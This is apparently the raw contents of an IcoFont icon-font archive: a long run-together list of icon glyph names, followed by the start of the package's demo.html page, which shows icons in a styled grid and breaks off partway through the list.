brand-legobrand-lenovobrand-levisbrand-lexusbrand-lgbrand-life-hackerbrand-linux-mintbrand-linuxbrand-lionixbrand-lorealbrand-louis-vuittonbrand-mac-osbrand-marvel-appbrand-mashablebrand-mazdabrand-mcdonalsbrand-mercedesbrand-micromaxbrand-microsoftbrand-mobilemebrand-mobilybrand-motorola	brand-msi	brand-mts
brand-myspace
brand-mytv
brand-nasabrand-natgeo	brand-nbc
brand-nescafebrand-nestle
brand-netflixbrand-nexus
brand-nikebrand-nokiabrand-nvidiabrand-omegabrand-opensusebrand-oraclebrand-panasonicbrand-paypalbrand-pepsi
brand-philipsbrand-pizza-hutbrand-playstation
brand-pumabrand-qatar-air	brand-qvcbrand-readernaut
brand-redbullbrand-reebok
brand-reuters
brand-samsung	brand-sapbrand-saudia-airlinesbrand-scribdbrand-shell
brand-siemensbrand-sk-telecombrand-slidesharebrand-smashing-magazinebrand-snapchatbrand-sony-ericsson
brand-sonybrand-soundcloudbrand-sprint
brand-squidoobrand-starbucks	brand-stcbrand-steambrand-suzuki
brand-symbianbrand-t-mobilebrand-tangobrand-targetbrand-tata-indicombrand-techcrunch
brand-telenorbrand-teliasonerabrand-teslabrand-the-vergebrand-thenextweb
brand-toshibabrand-toyotabrand-tribenetbrand-ubuntubrand-unilever
brand-vaio
brand-verizonbrand-viberbrand-vodafonebrand-volkswagen
brand-walmartbrand-warnerbrosbrand-whatsappbrand-wikipedia
brand-windows
brand-wirebrand-wordpressbrand-xiaomibrand-yahoobuzzbrand-yamaha
brand-youtube
brand-zainbank-altbankbarcodebill-alt	billboardbriefcase-1briefcase-2businessman
businesswomanchaircoinscompanycontact-addfiles-stackhandshake-dealid-cardmeeting-add	money-bag	pie-chartpresentation-altpresentationstampstock-mobilechart-arrows-axischart-bar-graphchart-flow-1chart-flow-2
chart-flowchart-growthchart-histogram-altchart-histogramchart-line-alt
chart-line
chart-pie-alt	chart-piechart-radar-grapharchitecture-altarchitecture	barricadeboltbricksbuilding-alt
bull-dozercalculations
cement-mixcement-mixerconcrete-mixerdanger-zonedrill
eco-energyeco-environmen
energy-air
energy-oilenergy-savingsenergy-solarenergy-waterengineerfire-extinguisher-altfire-extinguisher	fix-tools	fork-liftglue-oil
hammer-althammer
help-robotindustries-1industries-2industries-3industries-4industries-5
industrieslabourminingpaint-brush	pollution
power-zoneradio-activerecycle-alt
recycling-mansafety-hat-light
safety-hatsawscrew-drivertools-1	tools-bag	tow-trucktrolleytrowelunder-construction-altunder-constructionvehicle-cement
vehicle-cranevehicle-delivery-van
vehicle-dozervehicle-excavatorvehicle-trucktorvehicle-wreckingworker
workers-groupwrench
afghani-false
afghani-minusafghani-plusafghani-trueafghani
baht-false
baht-minus	baht-plus	baht-truebaht
bitcoin-false
bitcoin-minusbitcoin-plusbitcoin-truebitcoindollar-flasedollar-minusdollar-plusdollar-truedollar
dong-false
dong-minus	dong-plus	dong-truedong
euro-false
euro-minus	euro-plus	euro-trueeurofrank-falsefrank-minus
frank-plus
frank-truefrank
hryvnia-false
hryvnia-minushryvnia-plushryvnia-truehryvnia
lira-false
lira-minus	lira-plus	lira-truelirapeseta-falsepeseta-minuspeseta-pluspeseta-truepeseta
peso-false
peso-minus	peso-plus	peso-truepesopound-falsepound-minus
pound-plus
pound-truepoundrenminbi-falserenminbi-minus
renminbi-plus
renminbi-truerenminbiriyal-falseriyal-minus
riyal-plus
riyal-trueriyalrouble-falserouble-minusrouble-plusrouble-trueroublerupee-falserupee-minus
rupee-plus
rupee-truerupee
taka-false
taka-minus	taka-plus	taka-truetakaturkish-lira-falseturkish-lira-minusturkish-lira-plusturkish-lira-trueturkish-lira	won-false	won-minuswon-pluswon-truewon	yen-false	yen-minusyen-plusyen-trueyen
android-nexusandroid-tabletapple-watchdrawing-tabletearphoneflash-drivegame-consolegame-controllergame-padgameheadphone-alt-1headphone-alt-2headphone-alt-3
headphone-alt	headphonehtc-oneimacipadiphone	ipod-nano
ipod-touchkeyboard-altkeyboard-wirelesskeyboard
laptop-altlaptopmacbookmagic-mouse
micro-chipmicrophone-alt
microphonemonitormouse
mp3-playernintendoplaystation-altpsvita	radio-micradiorefrigeratorsamsung-galaxysurface-tablet
ui-head-phoneui-keyboardwashing-machinewifi-routerwii-u
windows-lumiawireless-mousexbox-360
arrow-down
arrow-leftarrow-rightarrow-up
block-down
block-leftblock-rightblock-upbubble-downbubble-leftbubble-right	bubble-up
caret-down
caret-leftcaret-rightcaret-upcircled-downcircled-left
circled-right
circled-upcollapsecursor-dragcurved-double-leftcurved-double-rightcurved-downcurved-leftcurved-right	curved-updotted-downdotted-leftdotted-right	dotted-updouble-leftdouble-right
expand-alt	hand-down	hand-drag
hand-drag1
hand-drag2hand-drawn-alt-downhand-drawn-alt-lefthand-drawn-alt-righthand-drawn-alt-uphand-drawn-downhand-drawn-lefthand-drawn-right
hand-drawn-up
hand-grippers	hand-left
hand-righthand-upline-block-downline-block-leftline-block-right
line-block-uplong-arrow-downlong-arrow-leftlong-arrow-right
long-arrow-uprounded-collapserounded-double-leftrounded-double-rightrounded-downrounded-expandrounded-left-downrounded-left-uprounded-leftrounded-right-downrounded-right-up
rounded-right
rounded-upscroll-bubble-downscroll-bubble-leftscroll-bubble-rightscroll-bubble-upscroll-double-downscroll-double-leftscroll-double-rightscroll-double-upscroll-downscroll-leftscroll-long-downscroll-long-leftscroll-long-rightscroll-long-upscroll-right	scroll-upsimple-downsimple-left-downsimple-left-upsimple-leftsimple-right-downsimple-right-upsimple-right	simple-upsquare-downsquare-leftsquare-right	square-upstylish-downstylish-left
stylish-right
stylish-upswoosh-downswoosh-leftswoosh-right	swoosh-upthin-double-leftthin-double-right	thin-down	thin-left
thin-rightthin-upabcatomawardbell-altblack-boardbook-altbook
brainstormingcertificate-alt-1certificate-alt-2certificate	educationelectronfountain-pen	globe-altgraduate-altgraduategroup-studentshat-althat
instrument
lamp-lightmedalmicroscope-alt
microscopepaper	pen-alt-4pen-nibpencil-alt-5	quill-pen
read-book-alt	read-book
school-bag
school-busstudent-altstudentteacher	test-bulb
test-tube-alt
universityangry
astonished
confoundedconfusedcryingdizzyexpressionless
heart-eyeslaughing
nerd-smile
open-mouthragerolling-eyessadsimple-smileslightly-smilesmirkstuck-out-tongue
wink-smileworriedfile-alt
file-audiofile-avi-mp4file-bmp	file-codefile-css
file-documentfile-eps
file-excelfile-exe	file-filefile-flvfile-gif
file-html5
file-imagefile-iso	file-javafile-javascriptfile-jpg	file-midifile-movfile-mp3file-pdffile-phpfile-pngfile-powerpointfile-presentationfile-psbfile-psdfile-python	file-rubyfile-spreadsheetfile-sqlfile-svg	file-text	file-tiff
file-video	file-wavefile-wmv	file-wordfile-zipcycling-altcyclingdumbbell	dumbbells	gym-alt-1	gym-alt-2	gym-alt-3gym
muscle-weightmuscleapplearabian-coffee	artichoke	asparagusavocado	baby-foodbananabbqbeansbeerbell-pepper-capsicum
birthday-cakebreadbroccoliburgercabbagecarrotcauli-flowercheesechefcherrychicken-frychickencocktail
coconut-watercoconut
coffee-alt
coffee-cup
coffee-mug
coffee-potcolacorn	croissant
crop-plantcucumberculinarycup-cakedining-tabledonut	egg-plantegg-poached
farmer-altfarmer	fast-foodfood-basket	food-cartfork-and-knifefrench-friesfruitsgrapeshoneyhot-dog
ice-cream-alt	ice-creamjuiceketchupkiwilayered-cake	lemon-altlemonlobstermangomilkmushroomnoodlesonionorangepearpeaspepperpie-altpie	pineapplepizza-slicepizzaplantpopcornpotatopumpkinraddishrestaurant-menu
restaurantsalt-and-peppersandwichsausagesoft-drinks	soup-bowlspoon-and-forksteak
strawberrysub-sandwichsushitacotea-potteatomato
watermelonwheat
baby-backpack
baby-clothbaby-milk-bottlebaby-trolleybabycandy
holding-hands
infant-nipplekids-scooter
safety-pin
teddy-beartoy-balltoy-cattoy-ducktoy-elephanttoy-hand	toy-horse	toy-lattu	toy-trainburglar
cannon-firing	cc-camera	cop-badgecopcourt-hammercourtfinger-printgavelhandcuff-althandcuff
investigationinvestigatorjailjudge	law-alt-1	law-alt-2	law-alt-3law-booklaw-document	law-orderlaw-protect
law-scaleslawyer-alt-1lawyer-alt-2lawyerlegalpistolpolice-badge
police-cappolice-car-alt-1police-car-alt-2
police-car
police-hat
police-vanpolice	thief-altthief
abacus-altabacus	angle-180angle-45angle-90anglecalculator-alt-1calculator-alt-2
calculatorcircle-ruler-altcircle-ruler
compass-alt-1
compass-alt-2
compass-alt-3
compass-alt-4golden-ratiomarker-alt-1marker-alt-2marker-alt-3markermathmathematical-alt-1mathematical-alt-2mathematical	pen-alt-1	pen-alt-2	pen-alt-3pen-holder-alt-1
pen-holderpenpencil-alt-1pencil-alt-2pencil-alt-3pencil-alt-4pencilruler-alt-1ruler-alt-2ruler-compass-alt
ruler-compassruler-pencil-alt-1ruler-pencil-alt-2ruler-pencilruler
rulers-altrulerssquare-root
ui-calculatoraidsambulance-crescentambulance-cross	ambulanceautismbandageblind
blood-drop
blood-testblood	brain-altbraincapsulecrutchdisabled	dna-alt-1	dna-alt-2dna
doctor-altdoctor	drug-packdrug
first-aid-alt	first-aidheart-beat-alt
heart-beat	heartbeatherbalhospitalicuinjection-syringe
laboratorymedical-sign-altmedical-sign	nurse-altnursenursing-homeoperation-theaterparalysis-disabilitypatient-bedpatient-filepillsprescriptionpulsestethoscope-altstethoscope	stretchersurgeon-altsurgeontabletstest-bottle	test-tubethermometer-altthermometertoothxrayui-addui-alarm
ui-batteryui-blockui-bluetooth
ui-brightness
ui-browserui-calendarui-call	ui-cameraui-cart
ui-cell-phoneui-chatui-check
ui-clip-boardui-clipui-clockui-closeui-contact-listui-copyui-cut	ui-delete
ui-dial-phoneui-editui-emailui-fileui-fire-wallui-flash-light	ui-flight	ui-folderui-gameui-handicappedui-homeui-image
ui-laodingui-lockui-love-addui-love-brokenui-love-removeui-loveui-map
ui-messageui-messagingui-movieui-music-playerui-musicui-mute
ui-networkui-nextui-note	ui-officeui-passwordui-pauseui-play-stopui-play
ui-pointerui-powerui-pressui-previousui-rate-add
ui-rate-blankui-rate-remove	ui-rating	ui-record	ui-removeui-replyui-rotationui-rss	ui-searchui-settingsui-social-linkui-tagui-text-chatui-text-loadingui-themeui-timerui-touch-phone	ui-travel	ui-unlock
ui-user-groupui-user	ui-v-card
ui-video-chatui-video-message
ui-video-playui-video	ui-volume
ui-weatherui-wifi
ui-zoom-inui-zoom-outcassette-playercassetteforwardguitermovie
multimedia	music-alt
music-disk
music-notemusic-notesmusicmute-volumepause
play-alt-1
play-alt-2
play-alt-3
play-pauseplayrecordretro-music-diskrewind
song-notessound-wave-alt
sound-wavestop	video-alt	video-cam
video-clappervideo
volume-barvolume-downvolume-mute
volume-off	volume-upyoutube-play
2checkout-alt	2checkout
amazon-altamazonamerican-express-altamerican-express
apple-pay-alt	apple-paybank-transfer-alt
bank-transfer
braintree-alt	braintreecash-on-delivery-altcash-on-deliverydiners-club-alt-1diners-club-alt-2diners-club-alt-3diners-clubdiscover-altdiscovereway-altewaygoogle-wallet-alt-1google-wallet-alt-2google-wallet-alt-3
google-walletjcb-altjcbmaestro-altmaestromastercard-alt
mastercardpayoneer-altpayoneer
paypal-altpaypalsage-altsage
skrill-altskrill
stripe-altstripevisa-alt
visa-electronvisawestern-union-alt
western-unionboybusiness-man-alt-1business-man-alt-2business-man-alt-3business-manfemale	funky-mangirl-altgirlgroup
hotel-boy-alt	hotel-boykidman-in-glassespeoplesupport
user-alt-1
user-alt-2
user-alt-3
user-alt-4
user-alt-5
user-alt-6
user-alt-7user-female	user-maleuser-suiteduserusers-alt-1users-alt-2users-alt-3users-alt-4users-alt-5users-alt-6users-socialusers
waiter-altwaiterwoman-in-glassessearch-1search-2search-document
search-folder
search-job
search-mapsearch-propertysearch-restaurantsearch-stocksearch-usersearch500pxaimbadoobaidu-tieba
bbm-messengerbebobehanceblogger	bootstrap
brightkitecloudapp	concrete5	delicious
designbumpdesignfloat
deviantartdiggdotcmsdribbbledribbledropboxebuddyelloemberenvatoevernotefacebook-messengerfacebook
feedburnerflikrfolkd
foursquare
friendfeedghostgithubgnomegoogle-buzzgoogle-hangouts
google-mapgoogle-plusgoogle-talkhype-machine	instagram	kakaotalkkickstarterkikkiwiboxline-messengerlinelinkedin
linux-mintlive-messengerlivejournalmagentomeetmemeetupmixxnewsvinenimbuss
odnoklassnikiopencart
oscommercepandoraphotobucketpicasa	pinterest
prestashopqikqq
readernautredditrenrenrssshopifysilverstripeskypeslackslashdot	slidsharesmugmugsnapchat
soundcloudspotifystack-exchangestack-overflowsteamstumbleupontagged
technoratitelegramtindertrellotumblrtwitchtwittertypo3ubercartviberviddlervimeovinevirb
virtuemartvkwechatweibowhatsappxingyahooyelpyoukuyoutubezencartbadminton-birdiebaseball
baseballerbasketball-hoop
basketball
billiard-ball
boot-alt-1
boot-alt-2bootbowling-altbowlingcanoecheer-leaderclimbingcorner	field-altfieldfootball-altfootball-americanfootballfoulgoal-keepergoalgolf-altgolf-bag	golf-cart
golf-fieldgolfgolferhelmet
hockey-althockey	ice-skate
jersey-altjerseyjumpingkicklegmatch-reviewmedal-sportoffsideolympic-logoolympicpaddingpenalty-cardracer
racing-carracing-flag-altracing-flag
racings-wheelreferee
refree-jerseyresult-sport
rugby-ballrugby-playerrugbyrunner-alt-1runner-alt-2runnerscore-board
skiing-manskydiving-gogglessnow-mobilesteering	stopwatch
substituteswimmertable-tennisteam-altteam
tennis-playertennistracking
trophy-alttrophyvolleyball-altvolleyball-fire
volleyballwater-bottlewhistle-altwhistle
win-trophyalign-center
align-leftalign-rightall-capsboldbrush
clip-boardcode-altcolor-bucketcolor-pickercopy-invertcopycut
delete-altedit-alt
eraser-altfontheadingindent
italic-altitalicjustify-alljustify-centerjustify-left
justify-rightlink-brokenoutdent
paper-clip	paragraphpinprinterredorotationsave	small-capstrike-throughsub-listing	subscriptsuperscripttabletext-height
text-widthtrash	underlineundoair-balloonairplane-altairplanearticulated-truckauto-mobile
auto-rickshaw
bicycle-alt-1
bicycle-alt-2bicycle	bus-alt-1	bus-alt-2	bus-alt-3buscab	cable-car	car-alt-1	car-alt-2	car-alt-3	car-alt-4car
delivery-time
fast-deliveryfire-truck-alt
fire-truck
free-delivery
helicoptermotor-bike-alt
motor-bikemotor-biker	oil-truckrickshawrocket-alt-1rocket-alt-2rocketsail-boat-alt-1sail-boat-alt-2	sail-boatscooter	sea-planeship-altship
speed-boattaxitractor
train-linetrain-steamtram	truck-alttruck-loadedtruckvan-altvanyacht5-star-hotel
air-ticket	beach-bedbeachcamping-vestdirection-sign	hill-sidehillhotel
island-altislandsandals-femalesandals-male
travelling	breakdowncelsiuscloudscloudydusteclipse
fahrenheitforest-fire
full-night
full-sunny
hail-nighthail-rainy-nighthail-rainy-sunny
hail-rainy
hail-sunnyhail-thunder-nighthail-thunder-sunnyhail-thunderhail
hill-night
hill-sunny	hurricanemeteornightrainy-nightrainy-sunny
rainy-thunderrainysnow-alt
snow-flake	snow-tempsnow
snowy-hailsnowy-night-hailsnowy-night-rainysnowy-nightsnowy-rainysnowy-sunny-hailsnowy-sunny-rainysnowy-sunnysnowy-thunder-nightsnowy-thunder-sunny
snowy-thundersnowy-windy-nightsnowy-windy-sunnysnowy-windysnowysun-altsun-risesun-setsunsunny-day-tempsunny
thunder-lighttornadoumbrella-altumbrellavolcanowavewind-scale-0wind-scale-1
wind-scale-10
wind-scale-11
wind-scale-12wind-scale-2wind-scale-3wind-scale-4wind-scale-5wind-scale-6wind-scale-7wind-scale-8wind-scale-9
wind-waveswind
windy-hailwindy-night
windy-rainingwindy-sunnywindy-thunder-raining
windy-thunderwindyaddonsaddress-bookadjustalarmanchorarchiveat
attachmentaudio
automationbadgebag-altbagbanbar-codebarsbasket
battery-emptybattery-fullbattery-halfbattery-lowbeakerbeardbedbellbeveragebillbinbinary
binoculars	bluetoothbomb	book-markbox	briefcasebrokenbucketbucket1bucket2bugbuildingbulb-altbulletbullhornbullseyecalendar
camera-altcameracardcart-altcartccchargingchat	check-alt
check-circledcheckchecked
children-careclip
clock-time
close-circledclose-line-circledclose-line-squared-altclose-line-squared
close-lineclose-squared-alt
close-squaredclosecloud-download
cloud-refreshcloud-uploadcloudcode-not-allowedcodecommentcompass-altcompasscomputer
connectionconsolecontactscontrast	copyrightcredit-cardcropcrowncubecubes
dashboard-web	dashboarddatadatabase-adddatabase-lockeddatabase-removedatabasedeletediamond
dice-multipledicediscdiskettedocument-folderdownload-altdownload
downloadeddragdrag1drag2drag3earthebookeditejectemail
envelope-openenvelopeerasererror	excavatorexchangeexclamation-circleexclamation-squareexclamation-tringleexclamationexitexpand
external-linkexternaleye-alteye-blockedeye-droppereye	favouritefax	file-fillfilmfilterfire-alt	fire-burnfire
flag-alt-1
flag-alt-2flagflame-torchflash-lightflashflaskfocusfolder-openfolder
foot-printgarbagegear-altgeargearsgiftglassglobegraffitigroceryhandhanger	hard-disk	heart-althearthistoryhomehorn
hour-glassidimageinboxinfiniteinfo-circleinfo-squareinfoinstitution	interface	invisiblejacketjarjewlerykaratekey-holekeylabellamplayerslayoutleafleafletlearnlegolensletter	letterboxlibrarylicense	life-bouy	life-buoylife-jacket	life-ring
light-bulblighter
lightning-raylikeline-heightlink-altlinklist	listeninglistine-dotslisting-boxlisting-numberlive-supportlocation-arrowlocation-pinlockloginlollipop
long-drivelookloopluggagelunchlungs	magic-altmagicmagnetmail-boxmailmalemap-pinsmapmaximizemeasuremedicine
mega-phone
megaphone-alt	megaphonememorialmemory-cardmic-mutemicmilitarymillminus-circleminus-squareminusmobile-phonemoleculemoneymoonmopmuffinmustachenavigation-menu
navigation
network-towernetworknews	newspaper
no-smokingnot-allowednotebooknotepadnotificationnumberedoppositeopticoptionspackagepagepaintpaper-plane	paperclippaperspay
penguin-linuxpestlephone-circlephonepicturepinepixelspluginplus-circleplus-squareplus	polygonalpowerpriceprintpuzzleqr-codequeenquestion-circlequestion-squarequestion
quote-leftquote-rightrandomrecyclerefreshrepair	reply-allreplyresize
responsiveretweetroadrobotroyalrss-feedsafety
sale-discount	satellite	send-mailserversettings-altsettings	share-altshare-boxedshareshield
shopping-cartsign-insign-outsignalsite-mapsmart-phonesoccersort-altsortspacespannerspeech-commentsspeed-meter
spinner-alt-1
spinner-alt-2
spinner-alt-3
spinner-alt-4
spinner-alt-5
spinner-alt-6spinnerspreadsheetsquaressl-security
star-alt-1
star-alt-2starstreet-viewsupport-faqtack-pintagtags	tasks-alttasks	telephone	telescopeterminalthumbs-down	thumbs-up
tick-boxed	tick-marktickettie
toggle-off	toggle-ontools-alt-2toolstouch
traffic-lighttransparenttreeunique-ideaunlockunlocked
upload-altupload	usb-driveusbvector-pathverification-check
wall-clockwallwalletwarning-altwarning
water-dropweb
wheelchairwifi-altwifiworldzigzagzippedPK!�M>�66icofont/demo.htmlnu&1i�<!DOCTYPE html>
	<html>
	<head>
		<meta charset="utf-8">
		<title>Examples | IcoFont</title>
		<link rel="stylesheet" type="text/css" href="./icofont.min.css">
		<style type="text/css">
			body {
				margin: 0;
				padding: 0;
				background: #F6F6F9;
			}
			.header {
				border-bottom: 1px solid #DCDCE1;
				padding: 10px 0;
				margin-bottom: 10px;
			}
			.container {
				width: 980px;
				margin: 0 auto;
			}
			.ico-title {
				font-size: 2em;
			}
			.iconlist {
				margin: 0;
				padding: 0;
				list-style: none;
				text-align: center;
				width: 100%;
				display: flex;
				flex-wrap: wrap;
				flex-direction: row;
			}
			.iconlist li {
				position: relative;
				margin: 5px;
				width: 150px;
				cursor: pointer;
			}
			.iconlist li .icon-holder {
				position: relative;
				text-align: center;
				border-radius: 3px;
				overflow: hidden;
				padding-bottom: 5px;
				background: #ffffff;
				border: 1px solid #E4E5EA;
				transition: all 0.2s linear 0s;
			}
			.iconlist li .icon-holder:hover {
				background: #00C3DA;
				color: #ffffff;
			}
			.iconlist li .icon-holder:hover .icon i {
				color: #ffffff;
			}
			.iconlist li .icon-holder .icon {
				padding: 20px;
				text-align: center;
			}
			.iconlist li .icon-holder .icon i {
				font-size: 3em;
				color: #1F1142;
			}
			.iconlist li .icon-holder span {
				font-size: 14px;
				display: block;
				margin-top: 5px;
				border-radius: 3px;
			}
		</style>
	</head>
	<body>
	<div class="header">
		<div class="container">
			<h1 class="ico-title"> IcoFont Icons </h1>
		</div>
	</div>
	<div class="container">
		<ul class="iconlist">
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angry-monster"></i>
				</div> 
				<span> angry-monster </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bathtub"></i>
				</div> 
				<span> bathtub </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bird-wings"></i>
				</div> 
				<span> bird-wings </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bow"></i>
				</div> 
				<span> bow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-castle"></i>
				</div> 
				<span> castle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circuit"></i>
				</div> 
				<span> circuit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crown-king"></i>
				</div> 
				<span> crown-king </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crown-queen"></i>
				</div> 
				<span> crown-queen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dart"></i>
				</div> 
				<span> dart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-disability-race"></i>
				</div> 
				<span> disability-race </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diving-goggle"></i>
				</div> 
				<span> diving-goggle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eye-open"></i>
				</div> 
				<span> eye-open </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flora-flower"></i>
				</div> 
				<span> flora-flower </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flora"></i>
				</div> 
				<span> flora </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gift-box"></i>
				</div> 
				<span> gift-box </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-halloween-pumpkin"></i>
				</div> 
				<span> halloween-pumpkin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-power"></i>
				</div> 
				<span> hand-power </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-thunder"></i>
				</div> 
				<span> hand-thunder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-king-monster"></i>
				</div> 
				<span> king-monster </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-love"></i>
				</div> 
				<span> love </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magician-hat"></i>
				</div> 
				<span> magician-hat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-native-american"></i>
				</div> 
				<span> native-american </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-owl-look"></i>
				</div> 
				<span> owl-look </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-phoenix"></i>
				</div> 
				<span> phoenix </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-robot-face"></i>
				</div> 
				<span> robot-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sand-clock"></i>
				</div> 
				<span> sand-clock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shield-alt"></i>
				</div> 
				<span> shield-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ship-wheel"></i>
				</div> 
				<span> ship-wheel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skull-danger"></i>
				</div> 
				<span> skull-danger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skull-face"></i>
				</div> 
				<span> skull-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowmobile"></i>
				</div> 
				<span> snowmobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-space-shuttle"></i>
				</div> 
				<span> space-shuttle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-star-shape"></i>
				</div> 
				<span> star-shape </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swirl"></i>
				</div> 
				<span> swirl </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tattoo-wing"></i>
				</div> 
				<span> tattoo-wing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-throne"></i>
				</div> 
				<span> throne </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tree-alt"></i>
				</div> 
				<span> tree-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-triangle"></i>
				</div> 
				<span> triangle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-unity-hand"></i>
				</div> 
				<span> unity-hand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-weed"></i>
				</div> 
				<span> weed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-woman-bird"></i>
				</div> 
				<span> woman-bird </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bat"></i>
				</div> 
				<span> bat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bear-face"></i>
				</div> 
				<span> bear-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bear-tracks"></i>
				</div> 
				<span> bear-tracks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bear"></i>
				</div> 
				<span> bear </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bird-alt"></i>
				</div> 
				<span> bird-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bird-flying"></i>
				</div> 
				<span> bird-flying </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bird"></i>
				</div> 
				<span> bird </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-birds"></i>
				</div> 
				<span> birds </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bone"></i>
				</div> 
				<span> bone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bull"></i>
				</div> 
				<span> bull </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-butterfly-alt"></i>
				</div> 
				<span> butterfly-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-butterfly"></i>
				</div> 
				<span> butterfly </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-camel-alt"></i>
				</div> 
				<span> camel-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-camel-head"></i>
				</div> 
				<span> camel-head </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-camel"></i>
				</div> 
				<span> camel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat-alt-1"></i>
				</div> 
				<span> cat-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat-alt-2"></i>
				</div> 
				<span> cat-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat-alt-3"></i>
				</div> 
				<span> cat-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat-dog"></i>
				</div> 
				<span> cat-dog </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat-face"></i>
				</div> 
				<span> cat-face </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cat"></i>
				</div> 
				<span> cat </span>
			</div>
